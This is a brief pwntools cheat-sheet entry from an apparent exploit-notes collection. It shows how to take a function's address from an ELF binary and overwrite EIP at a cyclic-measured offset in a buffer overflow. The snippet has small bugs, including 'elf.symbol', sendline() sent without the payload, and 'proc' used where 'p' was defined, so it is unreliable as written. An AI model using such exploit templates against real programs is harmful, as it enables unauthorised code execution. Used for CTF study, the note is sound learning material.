killchain-compendium/Exploits/Binaries/pwntools Specifics.md

pwntools

Memory Addresses of ELF Binary

• Find address of function and use it on $eip

p = process(<binary>)
elf = ELF(<binary>)
__function = elf.symbol.<functionName>
payload = fit({
    42: __function # Length measured via cyclic 
})
p.sendline()
proc.interactive()